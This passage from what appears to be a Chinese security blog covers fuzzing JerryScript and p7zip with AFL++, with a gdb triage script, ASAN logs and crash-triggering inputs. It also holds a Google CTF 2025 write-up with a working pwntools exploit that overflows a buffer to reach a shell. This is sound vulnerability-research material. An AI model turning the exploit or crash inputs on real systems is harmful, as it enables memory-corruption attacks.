    if MODE == "link":
        # try symlink to absolute path
        try:
            os.symlink(str(src.resolve()), str(dest))
        except OSError:
            shutil.copy2(src, dest)
    else:
        shutil.copy2(src, dest)
    return dest

CRASH_PATTERNS = [
    r"Program received signal",
    r"SIGSEGV",
    r"SIGABRT",
    r"Segmentation fault",
    r"SIGILL",
    r"SIGFPE",
    r"^#0",            # backtrace frame 0
    r"AddressSanitizer",
    r"ASAN:",
    r"terminate called",
]

_crash_re = re.compile("|".join("(?:" + p + ")" for p in CRASH_PATTERNS), flags=re.I | re.M)

def detect_crash(text: str) -> bool:
    return bool(_crash_re.search(text))

# Turn off pagination so gdb.execute(..., to_string=True) returns full text
try:
    gdb.execute("set pagination off")
except Exception:
    pass

# The program to run is the one passed with --args ./jerry when launching gdb.
# gdb already knows the executable from --args; we will just set program args each run.
files = sorted([p for p in CRASH_DIR.iterdir() if p.is_file()])

summary = {"processed": 0, "crashes": 0, "saved": 0, "no_crash": 0}

for infile in files:
    summary["processed"] += 1
    name = infile.name
    logfile = LOG_DIR / (name + ".log")
    print("---- Processing:", name)

    # Set args or use stdin redirection
    if USE_STDIN:
        # clear any args (not necessary, but explicit)
        try:
            gdb.execute("set args")
        except Exception:
            pass
        run_cmd = "run < " + shlex.quote(str(infile))
    else:
        # set argv for the debugged program to the filename
        # (if your program accepts multiple args, adjust as needed)
        try:
            gdb.execute("set args " + shlex.quote(str(infile)))
        except Exception:
            pass
        run_cmd = "run"

    # Execute run and capture textual output
    try:
        out_run = gdb.execute(run_cmd, to_string=True)
    except gdb.error as e:
        # gdb.error may be thrown if the program exited in a way gdb treats specially;
        # capture the string representation and continue to collect bt below.
        out_run = str(e)

    # After run, collect a backtrace (best-effort)
    try:
        out_bt = gdb.execute("bt full", to_string=True)
    except Exception:
        try:
            out_bt = gdb.execute("bt", to_string=True)
        except Exception:
            out_bt = ""

    combined = out_run + "\n" + out_bt

    # Save log
    with logfile.open("w", encoding="utf-8", errors="replace") as f:
        f.write("COMMAND: " + run_cmd + "\n\n")
        f.write("=== RUN OUTPUT ===\n")
        f.write(out_run + "\n\n")
        f.write("=== BACKTRACE ===\n")
        f.write(out_bt + "\n")

    # Detect crash
    if detect_crash(combined):
        summary["crashes"] += 1
        crash_line = gdb.execute('x/i $rip', to_string=True)
        valid = False
        if "[" not in crash_line:
            continue
        for reg in x86_64_registers:
            if reg in crash_line[crash_line.index("["):crash_line.index("]")] and int(gdb.execute(f"p ${reg}", to_string=True).split(' ')[-1], 16) > 8:
                valid = True
        if not valid:
            continue
        print("  -> Valid crash detected. Log:", logfile)
        if PATTERN.lower() in combined.lower():
            print(f"     -> pattern '{PATTERN}' FOUND in backtrace/output. Not saving.")
        else:
            dest = install_file(infile)
            summary["saved"] += 1
            print(f"     -> pattern '{PATTERN}' NOT found. Saved to:", dest)
    else:
        summary["no_crash"] += 1
        print("  -> No crash detected. Log:", logfile)

    # Attempt to kill inferior if still running so we can restart cleanly next time
    try:
        gdb.execute("kill", to_string=True)
    except Exception:
        # ignore; keep going
        pass

# Final summary
print("\nDone.")
print("Summary:")
for k, v in summary.items():
    print(f"  {k}: {v}")
print("Logs:", LOG_DIR)
print("Valid candidates:", VALID_DIR)

# End of gdb_run.py

经过筛选后，我发现了一个很有意思的崩溃：

$ ./jerry-asan /storage/jsfuzz/valid/id:000005,sig:11,src:005743,time:469380,execs:12877861,op:havo
c,rep:4
=================================================================
==1365920==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7b6b9b700098 at pc 0x558aff052c4d bp 0x7ffcb9f80e60 sp 0x7ffcb9f80e50
READ of size 1 at 0x7b6b9b700098 thread T0
    #0 0x558aff052c4c in scanner_create_variables (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #1 0x558aff0551bc in parser_parse_function_arguments.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7b1bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #2 0x558aff0585c8 in parser_parse_function (/storage/jsfuzz/jerry-asan+0x7e5c8) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #3 0x558aff0a26bc in lexer_construct_function_object (/storage/jsfuzz/jerry-asan+0xc86bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #4 0x558aff0a6a77 in parser_parse_class (/storage/jsfuzz/jerry-asan+0xcca77) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #5 0x558aff0b6198 in parser_parse_statements (/storage/jsfuzz/jerry-asan+0xdc198) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #6 0x558aff057d49 in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7dd49) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #7 0x558aff008764 in jerry_parse_common.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x2e764) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #8 0x558aff0bf0bc in jerryx_source_parse_script (/storage/jsfuzz/jerry-asan+0xe50bc) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #9 0x558afeff6be3 in main (/storage/jsfuzz/jerry-asan+0x1cbe3) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)
    #10 0x7f6b9da27674  (/usr/lib/libc.so.6+0x27674) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #11 0x7f6b9da27728 in __libc_start_main (/usr/lib/libc.so.6+0x27728) (BuildId: 4fe011c94a88e8aeb6f2201b9eb369f42b4a1e9e)
    #12 0x558afeff72e4 in _start (/storage/jsfuzz/jerry-asan+0x1d2e4) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

Address 0x7b6b9b700098 is located in stack of thread T0 at offset 152 in frame
    #0 0x558aff055ffe in parser_parse_source.lto_priv.0 (/storage/jsfuzz/jerry-asan+0x7bffe) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b)

  This frame has 6 object(s):
    [32, 33) 'flags' (line 2041)
    [48, 49) 'flags' (line 2063)
    [64, 80) 'branch' (line 2253)
    [96, 112) 'literal'
    [128, 152) 'scanner_info_end' (line 2115) <== Memory access at offset 152 overflows this variable
    [192, 792) 'context' (line 1988)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/storage/jsfuzz/jerry-asan+0x78c4c) (BuildId: 85560800a62467c72ec57dc61008c1abe723d70b) in scanner_create_variables
Shadow bytes around the buggy address:
  0x7b6b9b6ffe00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6ffe80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b6fff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700000: f1 f1 f1 f1 01 f2 01 f2 00 00 f2 f2 f8 f8 f2 f2
=>0x7b6b9b700080: 00 00 00[f2]f2 f2 f2 f2 00 00 00 00 00 00 00 00
  0x7b6b9b700100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x7b6b9b700300: 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1365920==ABORTING

这个输入是：

class MyError extends Error {7667111111111111111;;;;;;;static
 { throwased = true;
  d = trsert.s}.defeuse(resourcd = true;
 new MyError(); });
stack.defer(function () {});
assert.throws(MyError, functction (# {
 Csu 12), .defer(function41024448kTtrspose()&
});

还有一个输入会使得用于寄存器间接寻址的寄存器 RDI 地址值变为 RDI 0x646573610a20650a ('\ne \nased')，RDI 内容是输入本身的一部分。不过很有意思的是它并不会触发 Address Sanitizer。说明 ASAN 很可能会改变某些调用栈帧的内存布局。（我手动 trim 了一下，不然这个输入真的又长又难看。）

class MyE{7667;;667;;sta;7;;667;;s;;#;statTtra;sta;7;;667;;;;;;;;s;;#;statTtra;;';s;;#at;#;statTtra;;';s;;#atTtra;;#;;sta;;;
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ase
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
ased6671;
6
e 
ased = 
class{76671;
6
;
s;;;;;;;;;;static
as}}}}|}}}Of(}}|}csleO}}}}|}}}Of}}|}02000(1167E0Y.u(3}}}}}}}}}PisleO}}}}|}}}Of}}|}02000(1167E000002000(11676cY.u(Pisle}}}}PisleO}}}}|}}}OfInfinityaa, new .u9PisleOaaaaa!pa}}}}}}PisleO}}}}|}}}Of

另外有很多与它相似的 crash inputs，可以很明显发现 JerryScript 对于 JS 类私有字段名的处理有很大问题。

总结

其实这是一次没什么意义的 fuzzing，fuzz 类似编译器的软件应该使用结构化的 fuzzer，而不是 AFL++ 这样基本依靠字节随机变异的 fuzzer，不然连语法检查都过不了很难进一步挖掘漏洞。之后我可能再尝试一下 fuzzilli，或者考虑自己手写一个 fuzzer（画大饼 ing）。

最近初入真实世界的二进制漏洞利用，看到了太多 AI 伪造 exploits 和毫无意义的“高危”CVE。各种漏洞挖掘有高到令人振奋的 bug bounty，但很少有组织愿意奖励 bug patches。这是否是安全研究与软件开发之间的脱节？（现实是许多开发者都反感这些夸张甚至虚假的漏洞报告。）

Google CTF 2025 PlayBook Writeup

作者: rik
时间: 2025-07-03
分类: 二进制安全
评论

struct PlayBook {
    int flags; // &1=used, &2=cmd, &4=note
    int sub_ids[10];
    char note[0x200]; // 0x2c
};

nesting_depth 在结束后不会置零，创建和结束前也不会检查是不是 0。创建 playbook 的时候不写 ENDSTEP 的话 nesting_depth 就会大于 0 而且会保留到下次创建时。new_playbook 创建 playbook 处理嵌套时需要将 id 暂存在数组中，且该数组另有一个元素指针。用户输入读取长度 buf_size 是一个栈上的变量，与暂存 id 数组低地址相邻。（这里的变量分配很反常，大概是用了在栈上的结构体，强制改变了栈上变量布局。）这样可以改 buf_size 为一个 index 值，从而溢出 struct PlayBook 里的 char note[0x200] 改到高地址相邻 step 的 flags 和 note。先创建一大堆没用的 step 把 index 扩大到超过 0x205。

Exp:

# 1 ~ 575 (576)
for _ in range(0x120):
    io.sendlineafter(b'5. Quit\n', b'2') # new
    io.sendlineafter(b'entry.\n',
f'''STEP
note: sh
ENDSTEP
'''.encode())

io.sendlineafter(b'5. Quit\n', b'3') # delete
io.sendlineafter(b'id:\n', b'569') # id: 569 (570)
io.sendlineafter(b'5. Quit\n', b'3') # delete
io.sendlineafter(b'id:\n', b'571') # id: 571 (572)
io.sendlineafter(b'5. Quit\n', b'3') # delete
io.sendlineafter(b'id:\n', b'573') # id: 573 (574)


io.sendlineafter(b'5. Quit\n', b'2') # new 569 570 571
io.sendlineafter(b'entry.\n',
f'''STEP
STEP
''')

io.sendlineafter(b'5. Quit\n', b'2') # new 572 573 574
io.sendlineafter(b'entry.\n',
f'''ENDSTEP
ENDSTEP
STEP
STEP
note: ''' + '\x03' * (0x204 + 40) + 'sh\n')

我没有精确计算应该先分配多少 playbook，exp 里 0x120 之类的数字没有特别含义。不成对的 STEP、ENDSTEP 也许只需要一个，解题时我求稳将 nesting_depth 设置为 2。

首次尝试 Fuzzing —— p7zip

作者: rik
时间: 2025-06-28
分类: 二进制安全
评论

第一次尝试

使用 archlinux 的 p7zip PKGBULD，修改编译器为 afl-clang-lto(++) 。

编译时发现一个函数指针类型转换的报错，用 -Wno-cast-function-type-strict 参数来抑制。

准备了三个随便的 7z 文件，放进 input 文件夹直接开始。（@@ 表示输入文件目录，而不是从 stdin 输入）

AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@

结果：我看也就娱乐 fuzz，效果一坨🔟。

第二次尝试

准备了很多只有一个或几个文件，大小仅 100+ 字节的 7z 文件作为输入。

AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@ -y

结果：覆盖率很快达到和第一次同样水平。

第三次尝试

了解到 7z 格式有 CRC 校验，估计大多数 fuzz 输入都死在校验上了。patch 源码去除校验：（应该使用 FUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION 宏）

static inline bool TestStartCrc(const Byte *p)
{
  (void)p; // 抑制 -Wunused-parameter
  return true;
}

if (CrcCalc(buffer2, nextHeaderSize_t) != nextHeaderCRC)
    ;

if (CrcCalc(data, unpackSize) != folders.FolderCRCs.Vals[i])
    ;

添加 -fsanitize=address -g 编译选项。添加 -so 运行选项，这样不会在目录里拉💩。

本来想加上 -si 参数从 stdin 输入压缩文件，应该可以大幅提升性能。但是 7z 格式竟然不支持，原因是 7z 有一部分文件头在文件末尾，解压前必须先读取。（意义不明...）

把整个 fuzzing 项目文件夹放在 tmpfs 里应该会更快吧，虽然 afl 官网教程推荐 ext2 + noatime。因为现在基本是在实验，暂时懒得配置 ext2 环境了。

AFL_USE_ASAN=1 AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@ -y -so

结果：本来不抱什么希望，睡了个午觉起来竟然就真的收集到了很多 crashes，但都是 OOM，没什么实际意义。（用 KDE Ark 打开其中某个 input，直接 coredump 了。）

==589143==ERROR: AddressSanitizer: requested allocation size 0x207ffffffffffff (0x208000000001000 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x6048688567e2 in operator new[](unsigned long) (/tmp/7zfuzz/7zr+0x1fa7e2) (BuildId: 8450a6b1d6712a80c42046efedb6d74eb798c38d)
    #1 0x604868c0e1e0 in CBuffer<unsigned char>::Alloc(unsigned long) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/../../Common/../../Common/MyBuffer.h:72:18
    #2 0x604868c1f5bd in NArchive::N7z::CInArchive::ReadAndDecodePackedStreams(unsigned long, unsigned long&, CObjectVector<CBuffer<unsigned char>>&, ICryptoGetTextPassword*, bool&, bool&, UString&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zIn.cpp:1187:10
    #3 0x604868c280ce in NArchive::N7z::CInArchive::ReadDatabase2(NArchive::N7z::CDbEx&, ICryptoGetTextPassword*, bool&, bool&, UString&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zIn.cpp:1705:28
    #4 0x604868be4ddd in NArchive::N7z::CInArchive::ReadDatabase(NArchive::N7z::CDbEx&, ICryptoGetTextPassword*, bool&, bool&, UString&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zIn.cpp:1743:25
    #5 0x604868be4ddd in NArchive::N7z::CHandler::Open(IInStream*, unsigned long const*, IArchiveOpenCallback*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../Archive/7z/7zHandler.cpp:708:30
    #6 0x604868dc6db4 in OpenArchiveSpec(IInArchive*, bool, IInStream*, unsigned long const*, IArchiveOpenCallback*, IArchiveExtractCallback*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:1599:3
    #7 0x604868dbc2ba in CArc::OpenStream2(COpenOptions const&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:2744:26
    #8 0x604868dc9229 in CArc::OpenStream(COpenOptions const&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3024:3
    #9 0x604868dcb6c1 in CArc::OpenStreamOrFile(COpenOptions&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3119:17
    #10 0x604868dcda76 in CArchiveLink::Open(COpenOptions&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3295:28
    #11 0x604868dd277e in CArchiveLink::Open2(COpenOptions&, IOpenCallbackUI*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3419:17
    #12 0x604868d49f6d in CArchiveLink::Open3(COpenOptions&, IOpenCallbackUI*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/OpenArchive.cpp:3487:17
    #13 0x604868d49f6d in CArchiveLink::Open_Strict(COpenOptions&, IOpenCallbackUI*) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/../Common/OpenArchive.h:437:22
    #14 0x604868d49f6d in Extract(CCodecs*, CObjectVector<COpenType> const&, CRecordVector<int> const&, CObjectVector<UString>&, CObjectVector<UString>&, NWildcard::CCensorNode const&, CExtractOptions const&, IOpenCallbackUI*, IExtractCallbackUI*, IFolderArchiveExtractCallback*, IHashCalc*, UString&, CDecompressStat&) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Common/Extract.cpp:422:30
    #15 0x604868e55d25 in Main2(int, char**) /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Console/Main.cpp:1378:21
    #16 0x604868e68411 in main /usr/src/debug/7zip/CPP/7zip/Bundles/Alone7z/../../UI/Console/MainAr.cpp:132:11
    #17 0x7bc23b33f6b4 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #18 0x7bc23b33f768 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #19 0x604868717a24 in _start (/tmp/7zfuzz/7zr+0xbba24) (BuildId: 8450a6b1d6712a80c42046efedb6d74eb798c38d)

==589143==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: allocation-size-too-big (/tmp/7zfuzz/7zr+0x1fa7e2) (BuildId: 8450a6b1d6712a80c42046efedb6d74eb798c38d) in operator new[](unsigned long)
==589143==ABORTING

这触发原理我还真没看明白，不过 7z 文件格式里有不少直接由用户控制长度的字段，出现这种情况也算正常吧。

第四次尝试

把 CPP/Common/MyBuffer.h 里内存分配相关的函数用 __attribute__((no_sanitize("address"))) 标记，这样就不会被 ASAN 追踪了。由于这些内存分配函数本来就是热点，所以性能提升了不少，也不会报无意义的 OOM 错误，而且应该不会错过什么漏洞（毕竟真的只是 new[] 而已）。

刚才发现 afl-llvm-cmplog 这个工具，通过插桩记录程序中的比较操作，帮助 afl++ 生成能触发关键路径的输入。要想启用，需要在编译时加上 AFL_LLVM_CMPLOG=1 环境变量，fuzz 时加上参数 -c 0。在面对需要特定文件格式输入（魔法头之类）的 fuzzing 时效果明显。

AFL_USE_ASAN=1 AFL_SKIP_CPUFREQ=1 afl-fuzz -i input -o output -- ./7zr x @@ -y -so

结果：map density 翻倍了！

wget https://www.gstatic.com/webp/gallery/1.webp -O input/1.webp
wget https://www.gstatic.com/webp/gallery/2.webp -O input/2.webp
wget https://www.gstatic.com/webp/gallery/3.webp -O input/3.webp
wget https://www.gstatic.com/webp/gallery/4.webp -O input/4.webp
wget https://www.gstatic.com/webp/gallery/5.webp -O input/5.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_01.webp -O input/test_01.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_02.webp -O input/test_02.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_03.webp -O input/test_03.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_04.webp -O input/test_04.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_05.webp -O input/test_05.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_06_lossless.webp -O input/test_06_lossless.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_06_lossy.webp -O input/test_06_lossy.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_07_lossless.webp -O input/test_07_lossless.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_07_lossy.webp -O input/test_07_lossy.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_08_lossless.webp -O input/test_08_lossless.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_08_lossy.webp -O input/test_08_lossy.webp
wget https://raw.githubusercontent.com/signalapp/Signal-Android/main/glide-webp/app/src/main/assets/test_09_large.webp -O input/test_09_large.webp

第五次尝试

AFL_QUIET=1

CC=afl-clang-lto CXX=afl-clang-lto++ ./configure --disable-shared

2 Master
4 AFL_USE_ASAN=1 AFL_USE_UBSAN=1 AFL_USE_CFISAN=1
6 AFL_LLVM_CMPLOG=1 -l 2AT
8 AFL_LLVM_LAF_ALL=1
10

cd CPP/7zip/Bundles/Alone2/

export EXEPTOR_CONFIG=$(pwd)/libexeptor.yaml
export EXEPTOR_LOG=$(pwd)/exeptor.log

LD_PRELOAD=/tmp/exeptor/build/libexeptor.so make -j -f ../../cmpl_clang_x64.mak CC=afl-clang-lto CXX=afl-clang-lto++ USE_ASM=1 MY_ASM="uasm"

AFL_QUIET=1 AFL_LLVM_CMPLOG=1 LD_PRELOAD=/tmp/exeptor/build/libexeptor.so make -j -f ../../cmpl_clang_x64.mak CC=afl-clang-lto CXX=afl-clang-lto++ USE_ASM=1 MY_ASM="uasm"

AFL_LLVM_LAF_ALL=1 LD_PRELOAD=/tmp/exeptor/build/libexeptor.so make -j -f ../../cmpl_clang_x64.mak CC=afl-clang-lto CXX=afl-clang-lto++ USE_ASM=1 MY_ASM="uasm"

-f

llvm-ar rcs 7z.a ./b/c_x64/*.o

docker build . -t fuzz-7zip
docker run --rm -it --tmpfs /ramdisk:exec fuzz-7zip
cp -r /root/fuzz/ /ramdisk/ && cd /ramdisk/fuzz
export AFL_TESTCACHE_SIZE=256
AFL_FINAL_SYNC=1 afl-fuzz -i input -o output -M master -a binary -G 1024 -b 2 -- ./7zz_normal x -so -tzip @@
AFL_USE_ASAN=1 afl-fuzz -i input -o output -S sanitizer -a binary -G 1024 -b 4 -- ./7zz_sanitizer x -so -tzip @@
afl-fuzz -i input -o output -S cmplog -a binary -G 1024 -b 6 -c 0 -l 2AT -- ./7zz_cmplog x -so -tzip @@
afl-fuzz -i input -o output -S compcov -a binary -G 1024 -b 8 -- ./7zz_cmpcov x -so -tzip @@

#define Z7_ST
#include "../CPP/7zip/Archive/Common/DummyOutStream.h"
#include "../CPP/7zip/Common/CWrappers.h"
#include "7zAlloc.h"
#include "7zTypes.h"
#include "Alloc.h"
#include "Xz.h"
#include <string.h>
#include <unistd.h>
static const ISzAlloc alloc = {SzAlloc, SzFree};
static int isMT = False;
static CXzStatInfo stat;
class FakeOutStream : public ISequentialOutStream {
  public:
    // IUnknown
    STDMETHOD(QueryInterface)(REFIID, void **) { return S_OK; }
    STDMETHOD_(ULONG, AddRef)() { return 1; }
    STDMETHOD_(ULONG, Release)() { return 1; }
    // ISequentialOutStream
    STDMETHOD(Write)(const void *, UInt32 size, UInt32 *processedSize) {
        *processedSize = size;
        return S_OK;
    }
};
// Dummy input stream for fuzzing, construt with const uint8_t *Data, size_t
// Size
#include <algorithm>
class BufInStream : public ISequentialInStream {
  private:
    const uint8_t *_data;
    size_t _size;
    size_t _pos;

  public:
    BufInStream() : _data(nullptr), _size(0), _pos(0) {}
    void SetData(const uint8_t *data, size_t size) {
        _data = data;
        _size = size;
        _pos = 0;
    }
    // IUnknown
    STDMETHOD(QueryInterface)(REFIID, void **) { return S_OK; }
    STDMETHOD_(ULONG, AddRef)() { return 1; }
    STDMETHOD_(ULONG, Release)() { return 1; }
    // ISequentialInStream
    STDMETHOD(Read)(void *data, UInt32 size, UInt32 *processedSize) {
        if (_pos >= _size) {
            if (processedSize)
                *processedSize = 0;
            return S_OK;
        }
        UInt32 toRead = (UInt32)std::min<size_t>(size, _size - _pos);
        memcpy(data, _data + _pos, toRead);
        _pos += toRead;
        if (processedSize)
            *processedSize = toRead;
        return S_OK;
    }
    STDMETHOD(Seek)(Int64 offset, UInt32 seekOrigin, UInt64 *newPosition) {
        if (seekOrigin == STREAM_SEEK_SET)
            _pos = (UInt32)offset;
        else if (seekOrigin == STREAM_SEEK_CUR)
            _pos += (UInt32)offset;
        else if (seekOrigin == STREAM_SEEK_END)
            _pos = (UInt32)(_size + offset);
        if (newPosition)
            *newPosition = _pos;
        return S_OK;
    }
};
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    CXzDecMtHandle p = XzDecMt_Create(&alloc, &g_AlignedAlloc);
    CXzDecMtProps props;
    XzDecMtProps_Init(&props);
    BufInStream inStream;
    inStream.SetData(Data, Size);
    FakeOutStream outStream;
    CSeqInStreamWrap inWrap;
    CSeqOutStreamWrap outWrap;
    CCompressProgressWrap progressWrap;
    inWrap.Init(&inStream);
    outWrap.Init(&outStream);
    SRes res = XzDecMt_Decode(p, &props, NULL, CODER_FINISH_ANY, &outWrap.vt,
                              &inWrap.vt, &stat, &isMT, NULL);
    XzDecMt_Destroy(p);
    return 0;
}